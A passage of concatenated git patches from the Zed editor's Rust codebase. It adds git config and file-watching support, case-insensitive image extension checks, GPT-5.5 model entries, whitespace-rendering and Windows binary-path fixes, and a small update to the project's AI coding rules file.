Duration::from_millis(100)); + let (mut watcher, _) = watcher.await; + while let Some(_) = watcher.next().await { + let Ok(_) = this.update(cx, |this, cx| { + for repo in this.repositories.values() { + repo.update(cx, |this, cx| { + if this.job_sender.is_closed() { + let (job_sender, state) = (this.refetch_repo_state)(cx); + this.repository_state = state; + this.job_sender = job_sender; + this.schedule_scan(None, cx); + } + }) + } + cx.emit(GitStoreEvent::GlobalConfigurationUpdated); + }) else { + return; + }; + } + }) + }) + .collect::>() + .into_boxed_slice() + }; + Self::new( worktree_store.clone(), buffer_store, @@ -499,6 +563,7 @@ impl GitStore { next_repository_id: Arc::new(AtomicU64::new(1)), downstream: None, project_environment: environment, + _fs_watches, fs, }, cx, @@ -1386,6 +1451,7 @@ impl GitStore { downstream, next_repository_id, fs, + .. } = &self.state else { return; @@ -1931,7 +1997,7 @@ impl GitStore { GitStoreState::Local { fs, .. } => { let fs = fs.clone(); cx.background_executor() - .spawn(async move { fs.git_clone(&repo, &path).await }) + .spawn(async move { fs.git_clone(&path, &repo).await }) } GitStoreState::Remote { upstream_client, @@ -1961,6 +2027,31 @@ impl GitStore { } } + pub fn git_config(&self, path: Arc, args: Vec, cx: &App) -> Task> { + match &self.state { + GitStoreState::Local { fs, .. } => { + let fs = fs.clone(); + cx.background_executor() + .spawn(async move { fs.git_config(&path, args).await }) + } + GitStoreState::Remote { + upstream_client, .. + } => { + // Prevent running git config commands for collab. + if upstream_client.is_via_collab() { + return Task::ready(Err(anyhow!( + "Git Config isn't support for project guests" + ))); + } + + // TODO: Implement this for remote repositories. + Task::ready(Err(anyhow!( + "Git Config isn't yet supported for remote projects" + ))) + } + } + } + async fn handle_update_repository( this: Entity, envelope: TypedEnvelope, @@ -4189,27 +4280,38 @@ impl Repository { Some(original_repo_abs_path), PathStyle::local(), ); - let state = cx - .spawn(async move |_, cx| { - LocalRepositoryState::new( - work_directory_abs_path, - dot_git_abs_path, - project_environment, - fs, - is_trusted, - cx, - ) - .await - .map_err(|err| err.to_string()) - }) - .shared(); - let job_sender = Repository::spawn_local_git_worker(state.clone(), cx); - let state = cx - .spawn(async move |_, _| { - let state = state.await?; - Ok(RepositoryState::Local(state)) - }) - .shared(); + let refetch_repo_state = Arc::new(move |cx: &mut Context| { + let work_directory_abs_path = work_directory_abs_path.clone(); + let dot_git_abs_path = dot_git_abs_path.clone(); + let project_environment = project_environment.clone(); + let fs = fs.clone(); + + let state = cx + .spawn(async move |_, cx| { + LocalRepositoryState::new( + work_directory_abs_path, + dot_git_abs_path, + project_environment, + fs, + is_trusted, + cx, + ) + .await + .map_err(|err| err.to_string()) + }) + .shared(); + let job_sender = Repository::spawn_local_git_worker(state.clone(), cx); + let state = cx + .spawn(async move |_, _| { + let state = state.await?; + Ok(RepositoryState::Local(state)) + }) + .shared(); + + (job_sender, state) + }); + + let (job_sender, state) = (refetch_repo_state)(cx); // todo(git_graph_remote): Make this subscription on both remote/local repo cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { @@ -4244,6 +4346,7 @@ impl Repository { initial_graph_data: Default::default(), commit_data: Default::default(), commit_data_handler: CommitDataHandlerState::Closed, + refetch_repo_state, } } @@ -4263,9 +4366,18 @@ impl Repository { original_repo_abs_path, path_style, ); - let repository_state = RemoteRepositoryState { project_id, client }; - let job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); - let repository_state = Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); + let refetch_repo_state = Arc::new(move |cx: &mut Context| { + let repository_state = RemoteRepositoryState { + project_id, + client: client.clone(), + }; + let job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); + let repository_state = + Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); + (job_sender, repository_state) + }); + + let (job_sender, repository_state) = (refetch_repo_state)(cx); Self { this: cx.weak_entity(), snapshot, @@ -4282,6 +4394,7 @@ impl Repository { initial_graph_data: Default::default(), commit_data: Default::default(), commit_data_handler: CommitDataHandlerState::Closed, + refetch_repo_state, } } @@ -5545,8 +5658,9 @@ impl Repository { snapshot .status() .filter_map(|entry| { - if let Some(ops) = - pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + if let Some(ops) = pending_ops + .get(&PathKey(entry.repo_path.as_ref().clone()), ()) + .filter(|ops| !ops.last_op_errored()) { if ops.staging() || ops.staged() { None @@ -5578,8 +5692,9 @@ impl Repository { snapshot .status() .filter_map(|entry| { - if let Some(ops) = - pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + if let Some(ops) = pending_ops + .get(&PathKey(entry.repo_path.as_ref().clone()), ()) + .filter(|ops| !ops.last_op_errored()) { if !ops.staging() && !ops.staged() { None @@ -7588,6 +7703,23 @@ impl Repository { self.pending_ops.edit(edits, ()); ids } + + pub fn access(&mut self, _cx: &App) -> oneshot::Receiver { + self.send_job(None, move |git_repo, _cx| async move { + match git_repo { + // TODO: Correctly handle remote repositories, where the user + // that's running the Zed remote may not own the `.git/` + // directory. For now we just return `GitAccess::Yes` so that + // remoting continues working as expected. + RepositoryState::Remote(..) => GitAccess::Yes, + RepositoryState::Local(state) => match state.backend.status(&[]).await { + Ok(_) => GitAccess::Yes, + Err(_) => GitAccess::No, + }, + } + }) + } + pub fn default_remote_url(&self) -> Option { self.remote_upstream_url .clone() diff --git a/crates/project/src/git_store/pending_op.rs b/crates/project/src/git_store/pending_op.rs index 1991eed407833d..269e17a4d4dc45 100644 --- a/crates/project/src/git_store/pending_op.rs +++ b/crates/project/src/git_store/pending_op.rs @@ -130,6 +130,12 @@ impl PendingOps { } false } + + /// Checks whether the last operation in the pending operations resulted in + /// an error. + pub fn last_op_errored(&self) -> bool { + self.ops.last().is_some_and(PendingOp::error) + } } impl PendingOp { diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index c0b39c33dd7263..af15ab445175e5 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -6036,6 +6036,10 @@ impl Project { .git_init(path, fallback_branch_name, cx) } + pub fn git_config(&self, path: Arc, args: Vec, cx: &App) -> Task> { + self.git_store.read(cx).git_config(path, args, cx) + } + pub fn buffer_store(&self) -> &Entity { &self.buffer_store } From 8b1d45083c2858c7b724e892ad8bb8684c828640 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:30:54 +0200 Subject: [PATCH 026/231] agent_ui: Recognize image file extensions case insensitively (#54786) Straightforward. Closes https://github.com/zed-industries/zed/issues/54308 Release Notes: - Fixed the file extension recognition logic for images in the agent UI being case sensitive. It is now case insensitive. --- crates/agent_ui/src/mention_set.rs | 44 ++++++++++++++++++++++++------ 1 file changed, 35 insertions(+), 9 deletions(-) diff --git a/crates/agent_ui/src/mention_set.rs b/crates/agent_ui/src/mention_set.rs index f62181c9f3d3e8..8c98b9458bbce8 100644 --- a/crates/agent_ui/src/mention_set.rs +++ b/crates/agent_ui/src/mention_set.rs @@ -211,10 +211,7 @@ impl MentionSet { ); let crease = if let MentionUri::File { abs_path } = &mention_uri - && let Some(extension) = abs_path.extension() - && let Some(extension) = extension.to_str() - && Img::extensions().contains(&extension) - && !extension.contains("svg") + && is_raster_image_path(abs_path) { let Some(project_path) = project .read(cx) @@ -343,12 +340,8 @@ impl MentionSet { else { return Task::ready(Err(anyhow!("project path not found"))); }; - let extension = abs_path - .extension() - .and_then(OsStr::to_str) - .unwrap_or_default(); - if Img::extensions().contains(&extension) && !extension.contains("svg") { + if is_raster_image_path(&abs_path) { if !supports_images { return Task::ready(Err(anyhow!("This model does not support images yet"))); } @@ -723,6 +716,25 @@ mod tests { other => panic!("Expected selection mention to resolve as text, got {other:?}"), } } + + #[test] + fn test_is_raster_image_path_is_case_insensitive() { + // Regression test for #54308: drag-and-dropping a file whose extension + // is uppercase (e.g. `.PNG`) used to be treated as a non-image file. + assert!(is_raster_image_path(Path::new("/tmp/image.png"))); + assert!(is_raster_image_path(Path::new("/tmp/image.PNG"))); + assert!(is_raster_image_path(Path::new("/tmp/image.Png"))); + assert!(is_raster_image_path(Path::new("/tmp/photo.JPEG"))); + assert!(is_raster_image_path(Path::new("/tmp/animation.GIF"))); + + // SVG is handled via a different code path and must not be reported here. + assert!(!is_raster_image_path(Path::new("/tmp/icon.svg"))); + assert!(!is_raster_image_path(Path::new("/tmp/icon.SVG"))); + + // Non-image extensions and paths with no extension. + assert!(!is_raster_image_path(Path::new("/tmp/notes.txt"))); + assert!(!is_raster_image_path(Path::new("/tmp/README"))); + } } /// Inserts a list of images into the editor as context mentions. @@ -846,6 +858,20 @@ fn image_format_from_external_content(format: image::ImageFormat) -> Option bool { + let Some(extension) = path.extension().and_then(OsStr::to_str) else { + return false; + }; + if extension.eq_ignore_ascii_case("svg") { + return false; + } + Img::extensions() + .iter() + .any(|known| known.eq_ignore_ascii_case(extension)) +} + pub(crate) fn load_external_image_from_path( path: &Path, default_name: &SharedString, From af837f5b1f4a5e5bba2744138e4236151f813e40 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Fri, 24 Apr 2026 15:04:32 -0400 Subject: [PATCH 027/231] Update AI rules to reflect that `AsyncApp` updates are now infallible (#54818) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- .rules | 2 -- 1 file changed, 2 deletions(-) diff --git a/.rules b/.rules index 67179a9f472ef7..4b4eb08c368a33 100644 --- a/.rules +++ b/.rules @@ -63,8 +63,6 @@ Within the closures, the inner `cx` provided to the closure must be used instead Trying to update an entity while it's already being updated must be avoided as this will cause a panic. -When `read_with`, `update`, or `update_in` are used with an async context, the closure's return value is wrapped in an `anyhow::Result`. - `WeakEntity` is a weak handle. It has `read_with`, `update`, and `update_in` methods that work the same, but always return an `anyhow::Result` so that they can fail if the entity no longer exists. This can be useful to avoid memory leaks - if entities have mutually recursive handles to each other they will never be dropped. ## Concurrency From e22fd9b652e8fde0da27fcc116bf63c3ac722062 Mon Sep 17 00:00:00 2001 From: Max Malkin <60683392+maxmalkin@users.noreply.github.com> Date: Fri, 24 Apr 2026 13:05:42 -0600 Subject: [PATCH 028/231] Fall back to empty workspace when devcontainer restore is cancelled (#54734) Closes #47872 Release Notes: - Fixed Zed exiting on startup when cancelling a failed devcontainer connection. It now falls back to an empty workspace. Co-authored-by: KyleBarton --- crates/zed/src/main.rs | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 234179f9a53b7a..9141fe1aa8ae31 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -1469,6 +1469,31 @@ pub(crate) async fn restore_or_create_workspace( .await?; } } + + // If the user cancelled a failed remote connection at startup, + // open_remote_project returns Ok but removes the window, so error_count + // stays 0 and the toast fallback above does not trigger. Without this + // check, Zed would exit silently. + if cx.update(|cx| cx.windows().is_empty()) { + cx.update(|cx| { + workspace::open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, window, cx| { + let restore_on_startup = + WorkspaceSettings::get_global(cx).restore_on_startup; + match restore_on_startup { + workspace::RestoreOnStartupBehavior::Launchpad => {} + _ => { + Editor::new_file(workspace, &Default::default(), window, cx); + } + } + }, + ) + }) + .await?; + } } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx)).await?; } else { From 5d4ff7d6435f9e6beb3ba941ec2f4fecc8b436a4 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 22:26:56 +0200 Subject: [PATCH 029/231] open_ai: Add support for gpt-5.5 (#54820) Release Notes: - Added support for GPT 5.5 and GPT 5.5 Pro via the OpenAI provider --- .../language_models/src/provider/open_ai.rs | 2 ++ crates/open_ai/src/open_ai.rs | 23 +++++++++++++++++-- 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 97bb5ef1e4d64b..c018a8da424fd2 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -327,6 +327,8 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointThreeCodex | Model::FivePointFour | Model::FivePointFourPro + | Model::FivePointFive + | Model::FivePointFivePro | Model::O1 | Model::O3 => true, Model::ThreePointFiveTurbo | Model::Four | Model::FourTurbo | Model::O3Mini => false, diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index cc54d20a91568d..e555235b993fd3 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -95,6 +95,10 @@ pub enum Model { FivePointFour, #[serde(rename = "gpt-5.4-pro")] FivePointFourPro, + #[serde(rename = "gpt-5.5")] + FivePointFive, + #[serde(rename = "gpt-5.5-pro")] + FivePointFivePro, #[serde(rename = "custom")] Custom { name: String, @@ -144,6 +148,8 @@ impl Model { "gpt-5.3-codex" => Ok(Self::FivePointThreeCodex), "gpt-5.4" => Ok(Self::FivePointFour), "gpt-5.4-pro" => Ok(Self::FivePointFourPro), + "gpt-5.5" => Ok(Self::FivePointFive), + "gpt-5.5-pro" => Ok(Self::FivePointFivePro), invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), } } @@ -168,6 +174,8 @@ impl Model { Self::FivePointThreeCodex => "gpt-5.3-codex", Self::FivePointFour => "gpt-5.4", Self::FivePointFourPro => "gpt-5.4-pro", + Self::FivePointFive => "gpt-5.5", + Self::FivePointFivePro => "gpt-5.5-pro", Self::Custom { name, .. } => name, } } @@ -192,6 +200,8 @@ impl Model { Self::FivePointThreeCodex => "gpt-5.3-codex", Self::FivePointFour => "gpt-5.4", Self::FivePointFourPro => "gpt-5.4-pro", + Self::FivePointFive => "gpt-5.5", + Self::FivePointFivePro => "gpt-5.5-pro", Self::Custom { display_name, .. } => display_name.as_deref().unwrap_or(&self.id()), } } @@ -216,6 +226,8 @@ impl Model { Self::FivePointThreeCodex => 400_000, Self::FivePointFour => 1_050_000, Self::FivePointFourPro => 1_050_000, + Self::FivePointFive => 1_050_000, + Self::FivePointFivePro => 1_050_000, Self::Custom { max_tokens, .. } => *max_tokens, } } @@ -243,6 +255,8 @@ impl Model { Self::FivePointThreeCodex => Some(128_000), Self::FivePointFour => Some(128_000), Self::FivePointFourPro => Some(128_000), + Self::FivePointFive => Some(128_000), + Self::FivePointFivePro => Some(128_000), } } @@ -251,7 +265,9 @@ impl Model { Self::Custom { reasoning_effort, .. } => reasoning_effort.to_owned(), - Self::FivePointThreeCodex | Self::FivePointFourPro => Some(ReasoningEffort::Medium), + Self::FivePointThreeCodex | Self::FivePointFourPro | Self::FivePointFivePro => { + Some(ReasoningEffort::Medium) + } _ => None, } } @@ -265,7 +281,8 @@ impl Model { Self::FiveCodex | Self::FivePointTwoCodex | Self::FivePointThreeCodex - | Self::FivePointFourPro => false, + | Self::FivePointFourPro + | Self::FivePointFivePro => false, _ => true, } } @@ -289,6 +306,8 @@ impl Model { | Self::FivePointThreeCodex | Self::FivePointFour | Self::FivePointFourPro + | Self::FivePointFive + | Self::FivePointFivePro | Self::FiveNano => true, Self::O1 | Self::O3 | Self::O3Mini | Model::Custom { .. } => false, } From 1c8bc1afae2afd4d03e18f89697a5c87018c6999 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Sat, 25 Apr 2026 00:16:20 +0200 Subject: [PATCH 030/231] Revert terminal changes from #54728 (#54836) Reverts parts of #54728, which seems to have causes scrolling issues in the terminal Release Notes: - N/A --- crates/terminal_view/src/terminal_element.rs | 28 ++++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index dc1b63fb09a7c5..1e07e1c49d43ac 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -185,14 +185,15 @@ impl LayoutRect { let position = { let alac_point = self.point; point( - origin.x + alac_point.column as f32 * dimensions.cell_width, + (origin.x + alac_point.column as f32 * dimensions.cell_width).floor(), origin.y + alac_point.line as f32 * dimensions.line_height, ) }; - let size = size( - dimensions.cell_width * self.num_of_cells as f32, + let size = point( + (dimensions.cell_width * self.num_of_cells as f32).ceil(), dimensions.line_height, - ); + ) + .into(); window.paint_quad(fill(Bounds::new(position, size), self.color)); } @@ -958,15 +959,13 @@ impl Element for TerminalElement { let (dimensions, line_height_px) = { let rem_size = window.rem_size(); let font_pixels = text_style.font_size.to_pixels(rem_size); - let line_height = window.pixel_snap(px(f32::from(font_pixels) * line_height)); + let line_height = f32::from(font_pixels) * line_height; let font_id = cx.text_system().resolve_font(&text_style.font()); - let cell_width = window.pixel_snap( - text_system - .advance(font_id, font_pixels, 'm') - .unwrap() - .width, - ); + let cell_width = text_system + .advance(font_id, font_pixels, 'm') + .unwrap() + .width; gutter = cell_width; let mut size = bounds.size; @@ -983,7 +982,7 @@ impl Element for TerminalElement { origin.x += gutter; ( - TerminalBounds::new(line_height, cell_width, Bounds { origin, size }), + TerminalBounds::new(px(line_height), cell_width, Bounds { origin, size }), line_height, ) }; @@ -1094,9 +1093,10 @@ impl Element for TerminalElement { // internal line number (which can be negative in Scrollable mode for // scrollback history). let rows_above_viewport = - ((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) as usize; + f32::from((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) + as usize; let visible_row_count = - (intersection.size.height / line_height_px).ceil() as usize + 1; + f32::from((intersection.size.height / line_height_px).ceil()) as usize + 1; TerminalElement::layout_grid( // Group cells by line and filter to only the visible screen rows. From 46613384224520363ea8f533cf4a7573ce97dae1 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Sat, 25 Apr 2026 09:11:27 +0300 Subject: [PATCH 031/231] Fix whitespace rendering in Zed (#54798) Closes https://github.com/zed-industries/zed/issues/49186 first Closes https://github.com/zed-industries/zed/issues/45775 second Release Notes: - Fixed whitespace rendering in Zed --- crates/editor/src/element.rs | 98 ++++++++++++++++++++++++++++-------- 1 file changed, 78 insertions(+), 20 deletions(-) diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index c52a0d76bdbc47..d980984c721c86 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -8963,6 +8963,10 @@ impl LineWithInvisibles { let mut layouts = Vec::with_capacity(max_line_count); let mut fragments: SmallVec<[LineFragment; 1]> = SmallVec::new(); let mut line = String::new(); + // Byte offset into the logical line used to position invisible markers. + // Unlike `line`, this is not cleared when we flush `shape_line` for + // mid-line inlays/replacements, so marker offsets stay correct in that case. + let mut line_byte_offset: usize = 0; let mut invisibles = Vec::new(); let mut width = Pixels::ZERO; let mut len = 0; @@ -9036,6 +9040,7 @@ impl LineWithInvisibles { width += size.width; len += highlighted_chunk.text.len(); + line_byte_offset += highlighted_chunk.text.len(); fragments.push(LineFragment::Element { id: renderer.id, element: Some(element), @@ -9065,6 +9070,7 @@ impl LineWithInvisibles { width += line_layout.width; len += highlighted_chunk.text.len(); + line_byte_offset += highlighted_chunk.text.len(); fragments.push(LineFragment::Text(line_layout)) } } @@ -9095,6 +9101,7 @@ impl LineWithInvisibles { }); line.clear(); + line_byte_offset = 0; styles.clear(); row += 1; line_exceeded_max_len = false; @@ -9136,8 +9143,8 @@ impl LineWithInvisibles { if highlighted_chunk.is_tab { if non_whitespace_added || !is_soft_wrapped { invisibles.push(Invisible::Tab { - line_start_offset: line.len(), - line_end_offset: line.len() + line_chunk.len(), + line_start_offset: line_byte_offset, + line_end_offset: line_byte_offset + line_chunk.len(), }); } } else { @@ -9149,7 +9156,10 @@ impl LineWithInvisibles { && (non_whitespace_added || !is_soft_wrapped) { Some(Invisible::Whitespace { - line_offset: line.len() + index, + line_start_offset: line_byte_offset + index, + line_end_offset: line_byte_offset + + index + + c.len_utf8(), }) } else { None @@ -9160,6 +9170,7 @@ impl LineWithInvisibles { } line.push_str(line_chunk); + line_byte_offset += line_chunk.len(); } } } @@ -9431,15 +9442,23 @@ impl LineWithInvisibles { line_start_offset, line_end_offset, } => (*line_start_offset, *line_end_offset, &layout.tab_invisible), - Invisible::Whitespace { line_offset } => { - (*line_offset, line_offset + 1, &layout.space_invisible) - } + Invisible::Whitespace { + line_start_offset, + line_end_offset, + } => ( + *line_start_offset, + *line_end_offset, + &layout.space_invisible, + ), }; - let x_offset: ScrollPixelOffset = self.x_for_index(token_offset).into(); + let token_x = self.x_for_index(token_offset); + // Center the marker inside the actual glyph's width so it lines up with + // proportional fonts instead of assuming a monospace `em_width` cell. + let glyph_width = (self.x_for_index(token_end_offset) - token_x).max(Pixels::ZERO); + let x_offset: ScrollPixelOffset = token_x.into(); let invisible_offset: ScrollPixelOffset = - ((layout.position_map.em_width - invisible_symbol.width).max(Pixels::ZERO) / 2.0) - .into(); + ((glyph_width - invisible_symbol.width).max(Pixels::ZERO) / 2.0).into(); let origin = content_origin + gpui::point( Pixels::from( @@ -9635,8 +9654,13 @@ enum Invisible { line_start_offset: usize, line_end_offset: usize, }, + /// A whitespace character (ASCII space or any other Unicode whitespace). + /// + /// Storing both offsets correctly accounts for multi-byte whitespace characters + /// such as U+00A0 NO-BREAK SPACE, keeping adjacency checks correct. Whitespace { - line_offset: usize, + line_start_offset: usize, + line_end_offset: usize, }, } @@ -11201,7 +11225,6 @@ impl Element for EditorElement { scroll_max, line_layouts, line_height, - em_width, em_advance, em_layout_width, snapshot, @@ -12085,7 +12108,6 @@ pub(crate) struct PositionMap { pub scroll_position: gpui::Point, pub scroll_pixel_position: gpui::Point, pub scroll_max: gpui::Point, - pub em_width: Pixels, pub em_advance: Pixels, pub em_layout_width: Pixels, pub visible_row_range: Range, @@ -13424,7 +13446,8 @@ mod tests { line_end_offset: TAB_SIZE as usize, }, Invisible::Whitespace { - line_offset: TAB_SIZE as usize, + line_start_offset: TAB_SIZE as usize, + line_end_offset: TAB_SIZE as usize + 1, }, Invisible::Tab { line_start_offset: TAB_SIZE as usize + 1, @@ -13435,10 +13458,12 @@ mod tests { line_end_offset: TAB_SIZE as usize * 3, }, Invisible::Whitespace { - line_offset: TAB_SIZE as usize * 3 + 1, + line_start_offset: TAB_SIZE as usize * 3 + 1, + line_end_offset: TAB_SIZE as usize * 3 + 2, }, Invisible::Whitespace { - line_offset: TAB_SIZE as usize * 3 + 3, + line_start_offset: TAB_SIZE as usize * 3 + 3, + line_end_offset: TAB_SIZE as usize * 3 + 4, }, ]; assert_eq!( @@ -13468,6 +13493,34 @@ mod tests { } } + #[gpui::test] + fn test_multibyte_whitespace_uses_utf8_byte_offsets(cx: &mut TestAppContext) { + init_test(cx, |s| { + s.defaults.show_whitespaces = Some(ShowWhitespaceSetting::All); + }); + + // Regression test for #49186. NBSP (U+00A0) is rendered via the invisible + // character `replacement` pipeline, which flushes the internal `line` + // scratch buffer mid-line. Any whitespace invisible that follows must use + // the absolute byte offset within the logical line (here: byte 4 for the + // trailing ASCII space), not an offset relative to the post-flush buffer. + let actual_invisibles = collect_invisibles_from_new_editor( + cx, + EditorMode::full(), + "a\u{00A0}b ", + px(500.0), + false, + ); + + assert_eq!( + actual_invisibles, + vec![Invisible::Whitespace { + line_start_offset: 4, + line_end_offset: 5, + }] + ); + } + #[gpui::test] fn test_invisibles_dont_appear_in_certain_editors(cx: &mut TestAppContext) { init_test(cx, |s| { @@ -13508,19 +13561,24 @@ mod tests { line_end_offset: tab_size as usize, }, Invisible::Whitespace { - line_offset: tab_size as usize + 3, + line_start_offset: tab_size as usize + 3, + line_end_offset: tab_size as usize + 4, }, Invisible::Whitespace { - line_offset: tab_size as usize + 4, + line_start_offset: tab_size as usize + 4, + line_end_offset: tab_size as usize + 5, }, Invisible::Whitespace { - line_offset: tab_size as usize + 5, + line_start_offset: tab_size as usize + 5, + line_end_offset: tab_size as usize + 6, }, Invisible::Whitespace { - line_offset: tab_size as usize + 6, + line_start_offset: tab_size as usize + 6, + line_end_offset: tab_size as usize + 7, }, Invisible::Whitespace { - line_offset: tab_size as usize + 7, + line_start_offset: tab_size as usize + 7, + line_end_offset: tab_size as usize + 8, }, ]; let expected_invisibles = std::iter::once(repeated_invisibles) From 53b06974b0126287fddef9f50ba048ef2bfeb755 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Sat, 25 Apr 2026 09:14:41 +0300 Subject: [PATCH 032/231] Fix offline lookup of clangd on Windows (#54781) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes https://github.com/zed-industries/zed/issues/54042 Part of https://github.com/zed-industries/zed/issues/9789 This binary was not found when Zed first downloads the release, and then rerun offline on the same project. Using a `clangd-windows-21.1.0.zip ` archive from https://github.com/clangd/clangd/releases/tag/21.1.0 ``` ~/Downloads ❯ unzip -l clangd-windows-21.1.0.zip|rg clangd.exe 46908928 08-27-2025 01:40 clangd_21.1.0/bin/clangd.exe ``` Similarly, delve releases are in https://github.com/go-delve/delve/releases and codelldb are in https://github.com/vadimcn/codelldb/releases ``` ~/Downloads ❯ unzip -l codelldb-win32-x64.vsix|rg exe 1014272 04-21-2026 03:05 extension/bin/codelldb-launch.exe 4400128 04-21-2026 03:05 extension/adapter/codelldb.exe 242176 04-14-2026 04:14 extension/lldb/bin/lldb.exe 6272000 04-14-2026 04:14 extension/lldb/bin/lldb-server.exe 96768 04-14-2026 01:42 extension/lldb/bin/lldb-argdumper.exe 96768 04-14-2026 04:13 extension/lldb/lib/lldb-python/lldb/lldb-argdumper.exe 35284 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexer.py 101888 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w64.exe 168448 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w64-arm.exe 91648 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/w32.exe 108032 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t64.exe 182784 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t64-arm.exe 97792 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/distlib/t32.exe 12161 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/__init__.py 74926 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/_mapping.py 53448 04-14-2026 01:36 extension/lldb/lib/site-packages/pip/_vendor/pygments/lexers/python.py ``` Release Notes: - Fixed offline lookup of clangd on Windows --- crates/dap_adapters/src/codelldb.rs | 7 +++++-- crates/dap_adapters/src/go.rs | 8 ++++++-- crates/languages/src/c.rs | 8 ++++++-- 3 files changed, 17 insertions(+), 6 deletions(-) diff --git a/crates/dap_adapters/src/codelldb.rs b/crates/dap_adapters/src/codelldb.rs index 6c9dc0d49f9571..e4c7f3dce7b39f 100644 --- a/crates/dap_adapters/src/codelldb.rs +++ b/crates/dap_adapters/src/codelldb.rs @@ -1,4 +1,4 @@ -use std::{path::PathBuf, sync::OnceLock}; +use std::{env::consts, path::PathBuf, sync::OnceLock}; use anyhow::{Context as _, Result}; use async_trait::async_trait; @@ -374,7 +374,10 @@ impl DebugAdapter for CodeLldbDebugAdapter { } }; let adapter_dir = version_path.join("extension").join("adapter"); - let path = adapter_dir.join("codelldb").to_string_lossy().into_owned(); + let path = adapter_dir + .join(format!("codelldb{}", consts::EXE_SUFFIX)) + .to_string_lossy() + .into_owned(); self.path_to_codelldb.set(path.clone()).ok(); command = Some(path); }; diff --git a/crates/dap_adapters/src/go.rs b/crates/dap_adapters/src/go.rs index 93d0e8a958568c..7d9af1d73413be 100644 --- a/crates/dap_adapters/src/go.rs +++ b/crates/dap_adapters/src/go.rs @@ -446,7 +446,8 @@ impl DebugAdapter for GoDebugAdapter { _cx: &mut AsyncApp, ) -> Result { let adapter_path = paths::debug_adapters_dir().join(&Self::ADAPTER_NAME); - let dlv_path = adapter_path.join("dlv"); + let dlv_binary = format!("dlv{}", consts::EXE_SUFFIX); + let dlv_path = adapter_path.join(&dlv_binary); let delve_path = if let Some(path) = user_installed_path { path.to_string_lossy().into_owned() @@ -477,7 +478,10 @@ impl DebugAdapter for GoDebugAdapter { ); } - adapter_path.join("dlv").to_string_lossy().into_owned() + adapter_path + .join(&dlv_binary) + .to_string_lossy() + .into_owned() }; let cwd = Some( diff --git a/crates/languages/src/c.rs b/crates/languages/src/c.rs index bc75a9dbabbf06..6585863f993f30 100644 --- a/crates/languages/src/c.rs +++ b/crates/languages/src/c.rs @@ -80,7 +80,9 @@ impl LspInstaller for CLspAdapter { digest: expected_digest, } = version; let version_dir = container_dir.join(format!("clangd_{name}")); - let binary_path = version_dir.join("bin/clangd"); + let binary_path = version_dir + .join("bin") + .join(format!("clangd{}", consts::EXE_SUFFIX)); let binary = LanguageServerBinary { path: binary_path.clone(), @@ -388,7 +390,9 @@ async fn get_cached_server_binary(container_dir: PathBuf) -> Option Date: Sat, 25 Apr 2026 14:23:45 +0300 Subject: [PATCH 033/231] Fix code lens id clash (#54851) Follow-up to https://github.com/zed-industries/zed/pull/54100 Instead of relying on "line number" that could have overlapped depending on the range we query, use hierarchical IDset: `block id -> lens #` to ensure no clashes happen anymore. Release Notes: - N/A --- crates/editor/src/code_lens.rs | 21 +++++---------------- 1 file changed, 5 insertions(+), 16 deletions(-) diff --git 